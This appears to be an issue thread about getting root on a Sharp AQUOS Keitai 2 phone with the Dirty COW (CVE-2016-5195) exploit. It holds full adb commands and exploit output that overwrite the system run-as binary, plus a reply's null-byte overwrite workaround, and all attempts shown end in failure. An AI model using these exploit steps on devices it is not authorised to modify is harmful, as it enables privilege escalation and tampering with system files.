Sharp AQUOS Keitai 2 601SH - setresgid/setresuid failed

[rasuberiimochi]

Trying to run this because there is no other way to try and get access to the system on this phone on Lollipop 32-bit.

Make test labels it as vulnerable.

make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=armeabi-v7a APP_PLATFORM=android-22
make[1]: Entering directory '/Users/xxx/Downloads/Dirtyc0w stardust/CVE-2016-5195-master'
[armeabi-v7a] Install : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install : run-as => libs/armeabi-v7a/run-as
make[1]: Leaving directory '/Users/xxx/Downloads/Dirtyc0w stardust/CVE-2016-5195-master'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
libs/armeabi-v7a/dirtycow: 1 file push...pped. 46.8 MB/s (9156 bytes in 0.000s)
adb shell 'chmod 777 /data/local/tmp/dcow'
adb shell 'chmod 777 /data/local/tmp/dcow'
adb push libs/armeabi-v7a/run-as /data/local/tmp/run-as
libs/armeabi-v7a/run-as: 1 file pushed...pped. 26.2 MB/s (4696 bytes in 0.000s)
adb shell 'cat /system/bin/run-as > /data/local/tmp/run-as-original'
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as --no-pad'
WARNING: linker: Unsupported flags DT_FLAGS_1=0x8000001
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6ffffef5 arg 0x4dc
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6ffffffe arg 0x4bc
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6fffffff arg 0x1
dcow /data/local/tmp/run-as /system/bin/run-as
warning: source file size (4696) and destination file size (9444) differ
will overwrite first 4696 bytes of destination only

[] size 4696
[] mmap 0xb6e34000
[] currently 0xb6e34000=464c457f
[] using /proc/self/mem method
[] madvise thread starts, address 0xb6e34000, size 4696
[] check thread starts, address 0xb6e34000, size 4696
[] check thread stops, patch successful, iterations 0
[] /proc/self/mem 356896 76
[] madvise thread stops, return code sum 0, iterations 497
[] finished pid=0 sees 0xb6e34000=464c457f

__

adb shell
1|shell@SG601SH:/ $ /system/bin/run-as
WARNING: linker: Unsupported flags DT_FLAGS_1=0x8000001
WARNING: linker: /system/bin/run-as: unused DT entry: type 0x6ffffef5 arg 0x3c8
WARNING: linker: /system/bin/run-as: unused DT entry: type 0x6ffffffe arg 0x388
WARNING: linker: /system/bin/run-as: unused DT entry: type 0x6fffffff arg 0x2
uid /system/bin/run-as 2000
setresgid/setresuid failed
uid 2000
0 u:r:runas:s0
context 0 u:r:shell:s0
shell@SG601SH:/ $

[rasuberiimochi]

I suppose I should ref these issues for explanation? If SELinux capabilities are changed, does that mean the whole Dirtyc0w exploit is blocked from executing?

#45
#38
#88

[timwr]

warning: source file size (4696) and destination file size (9444) differ
will overwrite first 4696 bytes of destination only

I suspect it's because of this. You could try overwriting the run-as file with null bytes first?
E.g

truncate -s 9444 nullfile
adb push nullfile /data/local/tmp
adb shell /data/local/tmp/dcow /data/local/tmp/nullfile /system/bin/run-as
make root

[rasuberiimochi]

Thank you!

adb shell /data/local/tmp/dcow /data/local/tmp/nullfile /system/bin/run-as
WARNING: linker: Unsupported flags DT_FLAGS_1=0x8000001
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6ffffef5 arg 0x4dc
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6ffffffe arg 0x4bc
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6fffffff arg 0x1
dcow /data/local/tmp/nullfile /system/bin/run-as
[] size 9444
[] mmap 0xb6ea9000
[] currently 0xb6ea9000=464c457f
[] using /proc/self/mem method
[] check thread starts, address 0xb6ea9000, size 9444
[] madvise thread starts, address 0xb6ea9000, size 9444
[] /proc/self/mem 8735700 925
[] check thread stops, patch successful, iterations 1
[] madvise thread stops, return code sum 0, iterations 8055
[] finished pid=0 sees 0xb6ea9000=0

make root and shell return the same errors as before.